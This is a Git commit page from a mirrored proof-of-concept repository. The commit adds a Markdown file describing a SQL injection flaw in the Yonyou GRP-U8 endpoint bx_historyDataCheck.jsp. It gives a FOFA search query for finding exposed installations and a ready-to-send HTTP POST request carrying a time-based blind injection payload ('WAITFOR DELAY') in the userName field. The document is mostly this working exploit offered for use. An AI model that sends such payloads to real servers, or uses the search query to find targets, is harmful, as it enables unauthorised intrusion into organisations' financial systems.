admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2023-09-26 14:12:25 +08:00 committed by GitHub
parent 24a127a29d
commit 3a74f7a34f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞.md Normal file
View File

@ -0,0 +1,14 @@
## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
## fofa-qeury
app="yonyou-GRP-U8"
## POC
```
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
```